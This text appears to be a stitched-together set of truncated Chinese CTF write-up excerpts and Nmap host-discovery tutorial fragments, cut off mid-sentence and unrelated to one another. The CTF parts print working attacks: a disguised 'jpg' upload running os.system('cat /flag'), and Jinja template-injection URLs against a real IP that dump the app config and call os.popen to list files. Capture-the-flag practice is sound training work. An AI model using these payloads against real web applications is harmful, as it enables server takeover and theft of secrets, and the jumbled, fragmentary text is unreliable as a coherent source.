ZhShy

查看F12只允许上传图片文件创建一个python构造的jpg文件import osa = os.system('cat /flag')上传之后有flag了

进入页面之后F12没发现什么有用的东西。照例看看config：http://114.67.175.224:12482/?flag={{config}}没有flag试一试http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}__class__：用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。__i

题目：进入页面先按F12有个提示secret_key考虑模板注入输入url：http://114.67.175.224:10472/?flag={{config}}直接找到了flag如果访问http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}可以直接显示flag

文章目录一、IP发现二、ICMP发现1. ICMP的工作原理2. ICMP请求3.ICMP时间戳4. ICMP地址掩码请求三、TCP发现1. TCP工作原理2. TCP SYN发现发现主机就是指探测网络中活动的主机。发现主机是实施渗透测试的第一步，也是最重要的一步。只有先确定目标主机是活动的，才能进一步实施渗透测试。在Nmap中，可以通过不同的方法来发现主机，如IP发现、ICMP发现、TCP发现和UDP发现等。一、IP发现网际协议（Internet Protocol）是tcp/ip体系中的网络层协议。

文章目录一、指定单一主机1. Ip地址2. 域名二、指定多个主机1. CIDR格式2. 连续的主机3. 不连续的主机4.使用列表文件5. 指定扫描主机的所有IP地址三、排除主机被扫描四、使用随机主机方式实施扫描五、扫描方式1. 全部扫描2. 发包模式3. 恢复扫描一、指定单一主机1. Ip地址ifconfignmap [通过ifconfig查看本机ip]hostnamenmap [通过hostname查看主机名]2. 域名--dns-servers：指定特定的DNS服务器地址--sy